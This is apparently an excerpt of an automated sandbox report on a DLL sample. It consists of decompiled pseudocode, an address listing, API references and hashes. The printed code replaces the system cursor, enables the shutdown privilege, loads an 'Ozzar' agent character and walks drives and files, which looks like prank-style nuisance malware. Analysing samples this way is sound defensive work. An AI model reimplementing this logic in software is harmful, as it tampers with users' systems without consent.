						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t444);
						__eflags = _t855 - _t608;
						if(__eflags != 0) {
							_t856 =  *(_t855 + 4);
						} else {
							_t856 = 0;
						}
						_push(SendMessageA( *(_t865 + 0x2d0), 0x1003, _t608, _t856));
						E1002688E(_t608,  *(_t865 + 0x2d0), _t856, _t865, __eflags);
						_t857 = _t865 + 0x2b0;
						E10026562(_t865 + 0x2b0, 3, _t608, 0x100586d0, _t608, _t608, _t608, _t608);
						E10026562(_t865 + 0x2b0, 3, 1, 0x100586b0, _t608, _t608, 1, _t608);
						E10026562(_t865 + 0x2b0, 3, 2, 0x100586a4, _t608, _t608, 2, _t608);
						E10026562(_t865 + 0x2b0, 3, 3, 0x10058698, _t608, _t608, 3, _t608);
						E10026562(_t865 + 0x2b0, 3, 4, 0x1005868c, _t608, _t608, 4, _t608);
						E10026562(_t857, 3, 5, 0x10058684, _t608, _t608, 5, _t608);
						E10026562(_t857, 3, 6, 0x10058678, _t608, _t608, 6, _t608);
						 *(_t865 + 0x290) = _t608;
						 *(_t865 + 0x294) = _t608;
						 *(_t865 + 0x28c) = _t608;
						 *(_t865 + 0x278) = _t608;
						E10023187(_t608, _t857, _t865, __eflags);
						 *((intOrPtr*)(_t865 + 0x260)) = CopyIcon(LoadCursorA(_t608, 0x7f00));
						_t460 = LoadCursorFromFileA("mouse.ani");
						__eflags = _t460 - _t608;
						 *(_t865 + 0x25c) = _t460;
						_push(_t608);
						if(__eflags != 0) {
							_t857 = ShowCursor;
							ShowCursor(??);
							SetSystemCursor( *(_t865 + 0x25c), 0x7f00);
							ShowCursor(1);
						} else {
							_push(_t608);
							_push(0x10058658);
							E1002181C(_t608, _t857, _t865, __eflags);
						}
						OpenProcessToken(GetCurrentProcess(), 0x28, 0x1006f114);
						LookupPrivilegeValueA(_t608, "SeShutdownPrivilege", 0x1006f10c);
						_t819 =  *0x1006f114; // 0x0
						_t467 = 0x1006f10c->LowPart; // 0x0
						_t716 =  *0x1006f110; // 0x0
						0x1006f0fc->PrivilegeCount = 1;
						 *0x1006f100 = _t467;
						 *0x1006f104 = _t716;
						 *0x1006f108 = 2;
						AdjustTokenPrivileges(_t819, _t608, 0x1006f0fc, 0x10, _t608, _t608);
						_t469 = E10023187(_t608, _t857, _t865, __eflags);
						_t858 = _t865 + 0x6c4;
						E10022989(_t865 + 0x6c4, _t865 + 0x6c4, _t870, LoadMenuA( *(_t469 + 0xc), 0xa7));
						E10004790(_t865 + 0x6c4, _t865 + 0x6c4, _t608);
						 *((intOrPtr*)(_t865 + 0x74)) = 0x1e8;
						E10023187(_t608, _t865 + 0x6c4, _t865, __eflags);
						 *((intOrPtr*)(_t865 + 0x88)) = LoadIconA( *(E10023187(_t608, _t858, _t865, __eflags) + 0xc), 0x88);
						 *(_t865 + 0x78) =  *(_t865 + 0x20);
						_t479 = 0x1005861c;
						_t218 = _t479 + 1; // 0x1005861d
						_t859 = _t218;
						do {
							_t719 =  *_t479;
							_t479 = _t479 + 1;
							__eflags = _t719;
						} while (_t719 != 0);
						E1003C380(_t865 + 0x8c, 0x1005861c, _t479 - _t859 + 1);
						_t879 = _t878 + 0xc;
						 *((intOrPtr*)(_t865 + 0x84)) = 0x7d05;
						 *((intOrPtr*)(_t865 + 0x80)) = 7;
						_v148 = _t608;
						E1002A52A(_t608,  &_v148, _t859, _t865, __eflags);
						_v52 = 8;
						_t484 = E10001530( &_v216);
						_v56 = 9;
						E10016110(_t865 + 0x298, _t484);
						 *((char*)(_t879 + 0xc0)) = 8;
						E1001614A( &_v224);
						_v196 = _t608;
						E1002A52A(_t608,  &_v196, _t859, _t865, __eflags);
						_v64 = 0xa;
						_t489 = E100013D0( &_v228, "Ozzar",  &_v200);
						_v76 = 0xb;
						E10016110(_t865 + 0x2a8, _t489);
						_v80 = 0xa;
						E1001614A( &_v244);
						_t860 = __imp__#9;
						_v80 = 8;
						 *_t860( &_v216, "Ozzar.acs", "0");
						_t494 = E10001380( &_v248, "Ozzar");
						_v92 = 0xc;
						E10016110(_t865 + 0x2a0, _t494);
						_v96 = 8;
						E1001614A( &_v260);
						E100012C0( &_v260,  &_v196);
						E1001614A( &_v268);
						E1002A12B( &_v132);
						_v108 = 0xd;
						_t501 = GetSystemMetrics(_t608);
						asm("cdq");
						E10001160(_t865 + 0x2a0, _t501 -  &_v260 >> 1);
						_t505 = GetSystemMetrics(1);
						asm("cdq");
						E10001180(_t865 + 0x2a0, _t505 -  &_v260 >> 1);
						_t509 = GetSystemMetrics(1);
						E10001220( &_v280, GetSystemMetrics(_t608) - 0x96, _t509 - 0xc8, _t879 + 0xa4);
						E1001614A( &_v296);
						 *(_t879 + 0x88) = _t608;
						E1002A52A(_t608, _t879 + 0x88, _t860, _t865 + 0x2a0, __eflags);
						_v136 = 0xe;
						E1002A12B(_t879 + 0x94);
						_v140 = 0xf;
						E10001310(_t879 + 0x20, "Announce");
						E1001614A(_t879 + 0x1c);
						E100011D0(_t879 + 0x24, _t879 + 0x88, _t879 + 0x94);
						E1001614A( &_v324);
						E10001310( &_v324, "Wave");
						E1001614A( &_v332);
						E10001310( &_v332, "RestPose");
						E1001614A( &_v340);
						 *_t860( &_v220, 0x100585dc);
						 *_t860( &_v240);
						 *_t860( &_v212);
						 *_t860( &_v288);
						_t754 =  &_v276;
						 *((char*)(_t879 + 0xc0)) = 0;
						E1002A960(_t608, _t754,  &_v240, _t860, _t865 + 0x2a0, __eflags);
						_t535 = _v360 + 0xfffffff0;
						 *((intOrPtr*)(_t879 + 0xc0)) = 0xffffffff;
						asm("lock xadd [edx], ecx");
						__eflags = (_t754 | 0xffffffff) - 1;
						if((_t754 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t535)) + 4))))(_t535);
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t879 + 0xb8));
						return 1;
					} else {
						_t608 = _t865 + 0x7ec;
						while(1) {
							SHGetFileInfoA(_t852, 0, _t608, 0x160, 0x100);
							 *((intOrPtr*)(_t865 + 0x7e8)) = E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t852, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x7e4)), 0xffffffff, _t608->hIcon);
							_t846 = E100263F9(_t865 + 0x550, 0x23, _t852, _t551, _t551, 0, 0, 0, _v176, 0xffff0002);
							SendMessageA( *(_t865 + 0x570), 0x1114, 0, _t846);
							E1002A93C( &_v240, __eflags);
							_push(_t846);
							_push( &_v252);
							 *((char*)(_t878 + 0xc8)) = 1;
							E10026A46(_t608, _t865 + 0x550, _v176, _t846, _t865, __eflags);
							_t830 =  &_v260;
							_v112 = 2;
							_t558 = E10002170( &_v224, _t830, "\\*.*");
							_t878 = _t878 + 0xc;
							_push(0);
							_push( *_t558);
							_v112 = 3;
							_v272 = E1002A9C8( &_v248, _t830, __eflags);
							_t562 =  &(_v232[0xfffffffffffffff0]);
							 *((char*)(_t878 + 0xc0)) = 2;
							asm("lock xadd [ecx], edx");
							_t807 = (_t830 | 0xffffffff) - 1;
							__eflags = (_t830 | 0xffffffff) - 1;
							if((_t830 | 0xffffffff) - 1 <= 0) {
								_t807 =  *( *_t562);
								 *((intOrPtr*)( *((intOrPtr*)( *( *_t562) + 4))))(_t562);
							}
							__eflags = _v224;
							if(_v224 == 0) {
								goto L28;
							}
							while(1) {
								_v224 = E1002A655(_t878 + 0x38);
								_t571 = E100173A6();
								__eflags = _t571;
								_t637 = 0 | __eflags != 0x00000000;
								if(__eflags == 0) {
									goto L1;
								}
								_t835 =  *_t571;
								_v216 =  *((intOrPtr*)( *((intOrPtr*)(_t835 + 0xc))))() + 0x10;
								_v72 = 4;
								_t575 = E1002A903(_t878 + 0x38);
								__eflags = _t575;
								if(_t575 == 0) {
									_t835 =  *(_t878 + 0x38);
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t835 + 0x38))))(0x10);
									if(__eflags != 0) {
										_push(_t878 + 0x58);
										_t788 =  &_v212;
										SHGetFileInfoA( *(E1002AB67(_t608, _t788, _t835, _t846, _t865, __eflags)), 0, _t608, 0x160, 0x100);
										_t586 = _v204 + 0xfffffff0;
										asm("lock xadd [edx], ecx");
										__eflags = (_t788 | 0xffffffff) - 1;
										if(__eflags <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t586)) + 4))))(_t586);
										}
										_t589 = E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t846, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x7e4)), 0xffffffff, _t608->hIcon);
										_t838 =  &_v276;
										_push(_t838);
										 *((intOrPtr*)(_t865 + 0x7e8)) = _t589;
										_t590 = E1002ABF7(_t608,  &_v248, _t838, _t846, _t865, __eflags);
										_v116 = 5;
										E100263F9(_t865 + 0x550, 0x23,  *_t590,  *((intOrPtr*)(_t865 + 0x7e8)),  *((intOrPtr*)(_t865 + 0x7e8)), 0, 0, 0, _t846, 0xffff0002);
										_t594 = _v316 + 0xfffffff0;
										_v152 = 4;
										asm("lock xadd [ecx], edx");
										_t835 = (_t838 | 0xffffffff) - 1;
										__eflags = _t835;
										if(_t835 <= 0) {
											_t835 =  *( *_t594);
											 *((intOrPtr*)( *((intOrPtr*)(_t835 + 4))))(_t594);
										}
									}
								}
								_t577 = _v216 + 0xfffffff0;
								_v72 = 2;
								asm("lock xadd [ecx], edx");
								_t807 = (_t835 | 0xffffffff) - 1;
								__eflags = (_t835 | 0xffffffff) - 1;
								if((_t835 | 0xffffffff) - 1 <= 0) {
									_t807 =  *( *_t577);
									 *((intOrPtr*)( *((intOrPtr*)( *( *_t577) + 4))))(_t577);
								}
								__eflags = _v224;
								if(_v224 != 0) {
									continue;
								} else {
									goto L28;
								}
								goto L53;
							}
							goto L1;
							L28:
							_t563 =  &(_v228[_v212 + 1]);
							_v228 = _t563;
							_t833 =  &(_t563[1]);
							do {
								_t776 =  *_t563;
								_t563 =  &(_t563[1]);
								__eflags = _t776;
							} while (_t776 != 0);
							_t862 = _t563 - _t833;
							_t566 = _v220 + 0xfffffff0;
							_v212 = _t862;
							_v72 = 1;
							asm("lock xadd [ecx], edx");
							_t815 = (_t833 | 0xffffffff) - 1;
							__eflags = (_t833 | 0xffffffff) - 1;
							if(__eflags <= 0) {
								_t815 =  *( *_t566);
								 *((intOrPtr*)( *((intOrPtr*)( *( *_t566) + 4))))(_t566);
							}
							_v72 = 0;
							E1002A960(_t608, _t878 + 0x38, _t815, _t862, _t865, __eflags);
							__eflags = _t862;
							if(__eflags > 0) {
								_t852 = _v228;
								continue;
							} else {
								_t608 = 0;
								__eflags = 0;
								goto L34;
							}
							goto L53;
						}
					}
				} else {
					_t602 = _v204 + 0xfffffff0;
					 *((intOrPtr*)(_t878 + 0xc0)) = 0xffffffff;
					asm("lock xadd [ecx], edx");
					if((_t814 | 0xffffffff) - 1 <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t602)) + 4))))(_t602);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t878 + 0xb8));
					return 0;
				}
				L53:
			}
































































































































































                                                                                                                0x1000d150
                                                                                                                0x1000d156
                                                                                                                0x1000d158
                                                                                                                0x1000d163
                                                                                                                0x1000d164
                                                                                                                0x1000d16d
                                                                                                                0x1000d16e
                                                                                                                0x1000d175
                                                                                                                0x1000d17d
                                                                                                                0x1000d183
                                                                                                                0x1000d185
                                                                                                                0x1000d190
                                                                                                                0x1000d1a2
                                                                                                                0x1000d1b6
                                                                                                                0x1000d1c0
                                                                                                                0x1000d1ca
                                                                                                                0x1000d1d0
                                                                                                                0x1000d1d5
                                                                                                                0x1000d1da
                                                                                                                0x1000d1e2
                                                                                                                0x1000d1ee
                                                                                                                0x1000d204
                                                                                                                0x1000d209
                                                                                                                0x1000d21c
                                                                                                                0x1000d232
                                                                                                                0x1000d237
                                                                                                                0x1000d24a
                                                                                                                0x1000d260
                                                                                                                0x1000d265
                                                                                                                0x1000d278
                                                                                                                0x1000d28e
                                                                                                                0x1000d293
                                                                                                                0x1000d2a6
                                                                                                                0x1000d2bc
                                                                                                                0x1000d2c1
                                                                                                                0x1000d2d4
                                                                                                                0x1000d2ea
                                                                                                                0x1000d2ef
                                                                                                                0x1000d302
                                                                                                                0x1000d313
                                                                                                                0x1000d318
                                                                                                                0x1000d31d
                                                                                                                0x1000d323
                                                                                                                0x1000d326
                                                                                                                0x1000d32b
                                                                                                                0x1000d337
                                                                                                                0x1000d33c
                                                                                                                0x1000d348
                                                                                                                0x1000d34d
                                                                                                                0x1000d359
                                                                                                                0x1000d35e
                                                                                                                0x1000d36a
                                                                                                                0x1000d36f
                                                                                                                0x1000d37b
                                                                                                                0x1000d380
                                                                                                                0x1000d38a
                                                                                                                0x1000d391
                                                                                                                0x1000d393
                                                                                                                0x1000d395
                                                                                                                0x1000d398
                                                                                                                0x1000d39a
                                                                                                                0x1000d39c
                                                                                                                0x1000d3a1
                                                                                                                0x1000d3a1
                                                                                                                0x1000d3b2
                                                                                                                0x1000d3c1
                                                                                                                0x1000d3c8
                                                                                                                0x1000d3d5
                                                                                                                0x1000d3e5
                                                                                                                0x1000d3f2
                                                                                                                0x1000d402
                                                                                                                0x1000d40f
                                                                                                                0x1000d41f
                                                                                                                0x1000d42d
                                                                                                                0x1000d43d
                                                                                                                0x1000d44b
                                                                                                                0x1000d45b
                                                                                                                0x1000d469
                                                                                                                0x1000d479
                                                                                                                0x1000d487
                                                                                                                0x1000d497
                                                                                                                0x1000d4a5
                                                                                                                0x1000d4b5
                                                                                                                0x1000d4c3
                                                                                                                0x1000d4d3
                                                                                                                0x1000d4e1
                                                                                                                0x1000d4f1
                                                                                                                0x1000d4ff
                                                                                                                0x1000d50f
                                                                                                                0x1000d51d
                                                                                                                0x1000d52d
                                                                                                                0x1000d53b
                                                                                                                0x1000d54b
                                                                                                                0x1000d559
                                                                                                                0x1000d569
                                                                                                                0x1000d577
                                                                                                                0x1000d582
                                                                                                                0x1000d58c
                                                                                                                0x1000d591
                                                                                                                0x1000d593
                                                                                                                0x1000d599
                                                                                                                0x1000d595
                                                                                                                0x1000d595
                                                                                                                0x1000d595
                                                                                                                0x1000d5b0
                                                                                                                0x1000d5b1
                                                                                                                0x1000d5c2
                                                                                                                0x1000d5e6
                                                                                                                0x1000d5f0
                                                                                                                0x1000d5f2
                                                                                                                0x1000d5f2
                                                                                                                0x1000d5f6
                                                                                                                0x1000d5fb
                                                                                                                0x1000d600
                                                                                                                0x1000d60f
                                                                                                                0x1000d655
                                                                                                                0x1000d659
                                                                                                                0x1000d65b
                                                                                                                0x1000d65f
                                                                                                                0x1000d662
                                                                                                                0x1000d662
                                                                                                                0x1000d664
                                                                                                                0x1000d667
                                                                                                                0x1000d667
                                                                                                                0x1000d66b
                                                                                                                0x1000d66b
                                                                                                                0x1000d66d
                                                                                                                0x1000d671
                                                                                                                0x1000d944
                                                                                                                0x1000d950
                                                                                                                0x1000d95c
                                                                                                                0x1000d968
                                                                                                                0x1000d974
                                                                                                                0x1000d980
                                                                                                                0x1000d98e
                                                                                                                0x1000d99a
                                                                                                                0x1000d9a3
                                                                                                                0x1000d9b0
                                                                                                                0x1000d9b6
                                                                                                                0x1000d9bf
                                                                                                                0x1000d9c4
                                                                                                                0x1000d9c5
                                                                                                                0x1000d9ce
                                                                                                                0x1000d9d6
                                                                                                                0x1000d9dd
                                                                                                                0x1000d9e6
                                                                                                                0x1000d9ea
                                                                                                                0x1000d9ef
                                                                                                                0x1000d9f3
                                                                                                                0x1000da04
                                                                                                                0x1000da09
                                                                                                                0x1000da0d
                                                                                                                0x1000da16
                                                                                                                0x1000da18
                                                                                                                0x1000da1c
                                                                                                                0x1000da21
                                                                                                                0x1000da24
                                                                                                                0x1000da28
                                                                                                                0x1000da2a
                                                                                                                0x1000da32
                                                                                                                0x1000da41
                                                                                                                0x1000da34
                                                                                                                0x1000da34
                                                                                                                0x1000da3b
                                                                                                                0x1000da3b
                                                                                                                0x1000da45
                                                                                                                0x1000da48
                                                                                                                0x1000da4c
                                                                                                                0x1000da4d
                                                                                                                0x1000da51
                                                                                                                0x1000da59
                                                                                                                0x1000da62
                                                                                                                0x1000da67
                                                                                                                0x1000da72
                                                                                                                0x1000da72
                                                                                                                0x1000da77
                                                                                                                0x1000da77
                                                                                                                0x1000da88
                                                                                                                0x1000da92
                                                                                                                0x1000da97
                                                                                                                0x1000daaa
                                                                                                                0x1000dac0
                                                                                                                0x1000dac5
                                                                                                                0x1000dad8
                                                                                                                0x1000daee
                                                                                                                0x1000daf3
                                                                                                                0x1000db06
                                                                                                                0x1000db1c
                                                                                                                0x1000db21
                                                                                                                0x1000db34
                                                                                                                0x1000db4a
                                                                                                                0x1000db4f
                                                                                                                0x1000db62
                                                                                                                0x1000db78
                                                                                                                0x1000db7d
                                                                                                                0x1000db90
                                                                                                                0x1000dba6
                                                                                                                0x1000dbab
                                                                                                                0x1000dbbe
                                                                                                                0x1000dbd4
                                                                                                                0x1000dbd9
                                                                                                                0x1000dbdb
                                                                                                                0x1000dbe1
                                                                                                                0x1000dbdd
                                                                                                                0x1000dbdd
                                                                                                                0x1000dbdd
                                                                                                                0x1000dbf8
                                                                                                                0x1000dbf9
                                                                                                                0x1000dc08
                                                                                                                0x1000dc12
                                                                                                                0x1000dc27
                                                                                                                0x1000dc3c
                                                                                                                0x1000dc51
                                                                                                                0x1000dc66
                                                                                                                0x1000dc7b
                                                                                                                0x1000dc90
                                                                                                                0x1000dc95
                                                                                                                0x1000dc9b
                                                                                                                0x1000dca1
                                                                                                                0x1000dca7
                                                                                                                0x1000dcad
                                                                                                                0x1000dcca
                                                                                                                0x1000dcd0
                                                                                                                0x1000dcd6
                                                                                                                0x1000dcd8
                                                                                                                0x1000dcde
                                                                                                                0x1000dcdf
                                                                                                                0x1000dcee
                                                                                                                0x1000dcf4
                                                                                                                0x1000dd02
                                                                                                                0x1000dd0a
                                                                                                                0x1000dce1
                                                                                                                0x1000dce1
                                                                                                                0x1000dce2
                                                                                                                0x1000dce7
                                                                                                                0x1000dce7
                                                                                                                0x1000dd1a
                                                                                                                0x1000dd2b
                                                                                                                0x1000dd31
                                                                                                                0x1000dd37
                                                                                                                0x1000dd3c
                                                                                                                0x1000dd4d
                                                                                                                0x1000dd57
                                                                                                                0x1000dd5c
                                                                                                                0x1000dd62
                                                                                                                0x1000dd6c
                                                                                                                0x1000dd72
                                                                                                                0x1000dd80
                                                                                                                0x1000dd8f
                                                                                                                0x1000dd98
                                                                                                                0x1000dd9d
                                                                                                                0x1000dda4
                                                                                                                0x1000ddb9
                                                                                                                0x1000ddc2
                                                                                                                0x1000ddc5
                                                                                                                0x1000ddca
                                                                                                                0x1000ddca
                                                                                                                0x1000ddd0
                                                                                                                0x1000ddd0
                                                                                                                0x1000ddd2
                                                                                                                0x1000ddd5
                                                                                                                0x1000ddd5
                                                                                                                0x1000ddeb
                                                                                                                0x1000ddf0
                                                                                                                0x1000ddfc
                                                                                                                0x1000de06
                                                                                                                0x1000de10
                                                                                                                0x1000de15
                                                                                                                0x1000de25
                                                                                                                0x1000de2d
                                                                                                                0x1000de3b
                                                                                                                0x1000de43
                                                                                                                0x1000de4c
                                                                                                                0x1000de54
                                                                                                                0x1000de62
                                                                                                                0x1000de67
                                                                                                                0x1000de7d
                                                                                                                0x1000de85
                                                                                                                0x1000de91
                                                                                                                0x1000de99
                                                                                                                0x1000dea2
                                                                                                                0x1000deaa
                                                                                                                0x1000deaf
                                                                                                                0x1000deba
                                                                                                                0x1000dec2
                                                                                                                0x1000ded0
                                                                                                                0x1000dede
                                                                                                                0x1000dee6
                                                                                                                0x1000deef
                                                                                                                0x1000def7
                                                                                                                0x1000df08
                                                                                                                0x1000df11
                                                                                                                0x1000df1e
                                                                                                                0x1000df2a
                                                                                                                0x1000df32
                                                                                                                0x1000df34
                                                                                                                0x1000df3c
                                                                                                                0x1000df43
                                                                                                                0x1000df45
                                                                                                                0x1000df4d
                                                                                                                0x1000df5c
                                                                                                                0x1000df74
                                                                                                                0x1000df7d
                                                                                                                0x1000df8e
                                                                                                                0x1000df96
                                                                                                                0x1000dfa3
                                                                                                                0x1000dfab
                                                                                                                0x1000dfbc
                                                                                                                0x1000dfc4
                                                                                                                0x1000dfcd
                                                                                                                0x1000dfe9
                                                                                                                0x1000dff2
                                                                                                                0x1000e003
                                                                                                                0x1000e00c
                                                                                                                0x1000e01d
                                                                                                                0x1000e026
                                                                                                                0x1000e033
                                                                                                                0x1000e03d
                                                                                                                0x1000e047
                                                                                                                0x1000e04e
                                                                                                                0x1000e050
                                                                                                                0x1000e054
                                                                                                                0x1000e05c
                                                                                                                0x1000e065
                                                                                                                0x1000e068
                                                                                                                0x1000e079
                                                                                                                0x1000e07e
                                                                                                                0x1000e080
                                                                                                                0x1000e08a
                                                                                                                0x1000e08a
                                                                                                                0x1000e098
                                                                                                                0x1000e0a7
                                                                                                                0x1000d677
                                                                                                                0x1000d677
                                                                                                                0x1000d684
                                                                                                                0x1000d692
                                                                                                                0x1000d6ce
                                                                                                                0x1000d6d9
                                                                                                                0x1000d6ea
                                                                                                                0x1000d6f4
                                                                                                                0x1000d6f9
                                                                                                                0x1000d6fe
                                                                                                                0x1000d705
                                                                                                                0x1000d70d
                                                                                                                0x1000d717
                                                                                                                0x1000d721
                                                                                                                0x1000d729
                                                                                                                0x1000d72e
                                                                                                                0x1000d733
                                                                                                                0x1000d735
                                                                                                                0x1000d73a
                                                                                                                0x1000d747
                                                                                                                0x1000d74f
                                                                                                                0x1000d752
                                                                                                                0x1000d760
                                                                                                                0x1000d764
                                                                                                                0x1000d765
                                                                                                                0x1000d767
                                                                                                                0x1000d76b
                                                                                                                0x1000d771
                                                                                                                0x1000d771
                                                                                                                0x1000d773
                                                                                                                0x1000d778
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000d780
                                                                                                                0x1000d789
                                                                                                                0x1000d78d
                                                                                                                0x1000d794
                                                                                                                0x1000d796
                                                                                                                0x1000d79b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000d7a1
                                                                                                                0x1000d7ad
                                                                                                                0x1000d7b5
                                                                                                                0x1000d7bd
                                                                                                                0x1000d7c2
                                                                                                                0x1000d7c4
                                                                                                                0x1000d7ca
                                                                                                                0x1000d7d9
                                                                                                                0x1000d7db
                                                                                                                0x1000d7e5
                                                                                                                0x1000d7e6
                                                                                                                0x1000d7ff
                                                                                                                0x1000d809
                                                                                                                0x1000d812
                                                                                                                0x1000d817
                                                                                                                0x1000d819
                                                                                                                0x1000d823
                                                                                                                0x1000d823
                                                                                                                0x1000d83b
                                                                                                                0x1000d840
                                                                                                                0x1000d844
                                                                                                                0x1000d849
                                                                                                                0x1000d84f
                                                                                                                0x1000d873
                                                                                                                0x1000d87b
                                                                                                                0x1000d884
                                                                                                                0x1000d887
                                                                                                                0x1000d895
                                                                                                                0x1000d899
                                                                                                                0x1000d89a
                                                                                                                0x1000d89c
                                                                                                                0x1000d8a0
                                                                                                                0x1000d8a6
                                                                                                                0x1000d8a6
                                                                                                                0x1000d89c
                                                                                                                0x1000d7db
                                                                                                                0x1000d8ac
                                                                                                                0x1000d8b5
                                                                                                                0x1000d8bd
                                                                                                                0x1000d8c1
                                                                                                                0x1000d8c2
                                                                                                                0x1000d8c4
                                                                                                                0x1000d8c8
                                                                                                                0x1000d8ce
                                                                                                                0x1000d8ce
                                                                                                                0x1000d8d0
                                                                                                                0x1000d8d5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000d8d5
                                                                                                                0x00000000
                                                                                                                0x1000d8db
                                                                                                                0x1000d8e3
                                                                                                                0x1000d8e7
                                                                                                                0x1000d8eb
                                                                                                                0x1000d8f0
                                                                                                                0x1000d8f0
                                                                                                                0x1000d8f2
                                                                                                                0x1000d8f5
                                                                                                                0x1000d8f5
                                                                                                                0x1000d8fb
                                                                                                                0x1000d901
                                                                                                                0x1000d904
                                                                                                                0x1000d908
                                                                                                                0x1000d916
                                                                                                                0x1000d91a
                                                                                                                0x1000d91b
                                                                                                                0x1000d91d
                                                                                                                0x1000d921
                                                                                                                0x1000d927
                                                                                                                0x1000d927
                                                                                                                0x1000d92d
                                                                                                                0x1000d935
                                                                                                                0x1000d93a
                                                                                                                0x1000d93c
                                                                                                                0x1000d680
                                                                                                                0x00000000
                                                                                                                0x1000d942
                                                                                                                0x1000d942
                                                                                                                0x1000d942
                                                                                                                0x00000000
                                                                                                                0x1000d942
                                                                                                                0x00000000
                                                                                                                0x1000d93c
                                                                                                                0x1000d684
                                                                                                                0x1000d611
                                                                                                                0x1000d615
                                                                                                                0x1000d618
                                                                                                                0x1000d629
                                                                                                                0x1000d630
                                                                                                                0x1000d63a
                                                                                                                0x1000d63a
                                                                                                                0x1000d645
                                                                                                                0x1000d654
                                                                                                                0x1000d654
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 1000D1A2
                                                                                                                • SendMessageA.USER32 ref: 1000D1B6
                                                                                                                • LoadIconA.USER32 ref: 1000D1EE
                                                                                                                • LoadIconA.USER32 ref: 1000D21C
                                                                                                                • LoadIconA.USER32 ref: 1000D24A
                                                                                                                • LoadIconA.USER32 ref: 1000D278
                                                                                                                • LoadIconA.USER32 ref: 1000D2A6
                                                                                                                • LoadIconA.USER32 ref: 1000D2D4
                                                                                                                • LoadIconA.USER32 ref: 1000D302
                                                                                                                  • Part of subcall function 10011BB0: SendMessageA.USER32 ref: 10011BCA
                                                                                                                  • Part of subcall function 10001DB0: _memmove_s.LIBCMT ref: 10001E0D
                                                                                                                  • Part of subcall function 10001DB0: _memcpy_s.LIBCMT ref: 10001E17
                                                                                                                • SendMessageA.USER32 ref: 1000D5AA
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000D5EA
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000D604
                                                                                                                • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 1000D692
                                                                                                                • SendMessageA.USER32 ref: 1000D6EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad$MessageSend$DriveLogicalStrings$FileInfo_memcpy_s_memmove_s
                                                                                                                • String ID: Announce$Ozzar$Ozzar.acs$RestPose$SeShutdownPrivilege$Wave$\*.*$data\*.*$mouse.ani
                                                                                                                • API String ID: 966112117-3269483239
                                                                                                                • Opcode ID: dccc14599d2c152c7233265e66226a70e11e2afe466b1512555df5cec033be7e
                                                                                                                • Instruction ID: f738ea85102179e069dd6e1d2d16925cff321856bed6e48fba8c51e9f2b41b3d
                                                                                                                • Opcode Fuzzy Hash: dccc14599d2c152c7233265e66226a70e11e2afe466b1512555df5cec033be7e
                                                                                                                • Instruction Fuzzy Hash: 78928F79204340AFE314DB64CC92FAAB3A9EF88354F444A1CF55A5B2D2DF70B944CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10010ED0 Relevance: 54.7, APIs: 29, Strings: 2, Instructions: 489windownetworkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E10010ED0(void* __ebx, void* __edx, void* __edi, void* __ebp, intOrPtr _a4) {
				int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v1012;
				char _v1016;
				char _v1020;
				char _v1024;
				signed int _v1028;
				intOrPtr _v1030;
				signed char _v1051;
				intOrPtr _v1052;
				signed short _v1054;
				intOrPtr _v1064;
				char _v1076;
				int _v1084;
				signed char _v1087;
				signed int _v1088;
				char _v1092;
				int _v1100;
				struct HWND__** _v1116;
				signed int _v1120;
				struct HWND__** _v1124;
				char _v1128;
				char _v1136;
				signed int _v1148;
				signed int _v1220;
				signed int _v1260;
				char _v1288;
				short _v1336;
				struct HWND__* _v1338;
				char _v1340;
				char _v1372;
				char _v1392;
				char _v1404;
				int _v1412;
				char _v1468;
				char _v1476;
				void* __esi;
				signed int _t116;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr* _t126;
				void* _t132;
				long _t135;
				void* _t137;
				void* _t142;
				intOrPtr* _t147;
				signed short _t151;
				void* _t155;
				intOrPtr* _t161;
				intOrPtr* _t163;
				signed int _t169;
				struct HWND__* _t171;
				void* _t174;
				intOrPtr* _t175;
				struct HWND__* _t176;
				struct HWND__* _t178;
				void* _t184;
				void* _t186;
				void* _t196;
				signed int _t214;
				void* _t215;
				intOrPtr* _t216;
				signed short _t217;
				void* _t238;
				struct HWND__** _t243;
				intOrPtr _t254;
				intOrPtr _t255;
